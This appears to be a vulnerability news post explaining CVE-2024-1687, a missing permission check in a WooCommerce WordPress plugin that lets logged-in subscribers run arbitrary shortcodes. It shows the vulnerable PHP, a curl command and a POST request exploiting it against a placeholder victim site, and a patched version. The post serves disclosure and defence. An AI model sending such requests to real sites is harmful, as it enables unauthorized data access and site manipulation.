CVE CyberSecurity Database News

CVE-2024-1687 - Exploiting WooCommerce Thank You Page Customizer — Shortcode Execution Vulnerability Explained

Poster -

Summary:
A critical vulnerability (CVE-2024-1687) has been discovered in the plugin *Thank You Page Customizer for WooCommerce – Increase Your Sales* for WordPress. This flaw impacts all versions up to 1.1.2 and lets authenticated users (even basic subscribers) execute arbitrary shortcodes through insecure use of the get_text_editor_content() function. If exploited, this could lead to privilege escalation, site manipulation, spam, or worse.

What Is the Vulnerability?

The "Thank You Page Customizer" plugin helps shop owners create custom WooCommerce thank you pages. Unfortunately, its developers forgot an important security step: it doesn’t check if the user has permission before letting them send content through the get_text_editor_content() AJAX function. This means any logged-in user—even a simple subscriber—can run any shortcode they please!

Path to the Issue

WordPress uses shortcodes wrapped in [shortcode] tags to add special, dynamic content to posts and pages. While they're powerful, shortcodes can be dangerous if the wrong people can use them, because attackers might trigger functions that change content, create users, or expose data.

Normally, WordPress plugins check things like current_user_can( 'edit_posts' ) before letting users execute actions like saving custom content. This plugin skips that.

Insecure function in the plugin

public function get_text_editor_content() {
    // FETCHES user input and executes do_shortcode() on it
    $content = stripslashes( $_POST['content'] );
    echo do_shortcode( $content );
    wp_die();
}

Notice anything missing? There’s zero check to see if the user is allowed to run this AJAX action!

content=[shortcode_here]

Sample exploit using curl

curl -b cookies.txt -k -d "action=get_text_editor_content&content=[your_shortcode]" https://victim-site.com/wp-admin/admin-ajax.php

Where cookies.txt contains your valid WordPress user session cookies.

Example attack

Suppose there's a shortcode [user_login_logout] that lists user info, or something custom like [plugin_exec_php] (if any such dangerous plugin is installed). An attacker can send:

POST /wp-admin/admin-ajax.php
action=get_text_editor_content
content=[user_login_logout]Hello!

The result will be the executed output of the shortcode, maybe even with sensitive data displayed in the response.

If plugins exposing file system functions are installed, it gets even worse — attackers could read files, emails, and more.

Let’s take apart the vulnerable part of the plugin

public function get_text_editor_content() {
    $content = stripslashes( $_POST['content'] );
    echo do_shortcode( $content ); // DANGEROUS: runs any shortcode provided!
    wp_die();
}

A secure alternative would be

public function get_text_editor_content() {
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( 'Unauthorized' );
    }
    $content = stripslashes( $_POST['content'] );
    echo do_shortcode( $content );
    wp_die();
}

This quick current_user_can() permission check stops low-level users from abusing the function.

Info Disclosure: Some shortcodes can leak user data, emails, or other sensitive info.

- Privilege Escalation: With certain plugins, attackers could give themselves admin rights, create new users, setup spam, or deface the site.
- Abusive Actions: Shortcodes that can send emails, create posts, or interact with external services pose a big risk.

Discovery and Responsible Disclosure

- Wordfence Advisory
- WPScan Vulnerability Database

> Current Status:
> As of June 2024, no patched version is available! The latest (1.1.2) is still vulnerable.

Conclusion

CVE-2024-1687 highlights how small oversights—like skipping a user capability check—can have huge consequences for WordPress sites. This vulnerability is *easy to exploit* and could lead to data leaks, site takeover, or damage to your business. Make sure your plugins are kept up to date and only activate plugins from reputable sources.


References
- Wordfence Vulnerability Report – CVE-2024-1687
- WPScan Entry – Thank You Page Customizer


Stay alert, and patch your site as soon as updates are released!

Timeline

Published on: 02/27/2024 06:15:45 UTC
Last modified on: 02/27/2024 14:20:06 UTC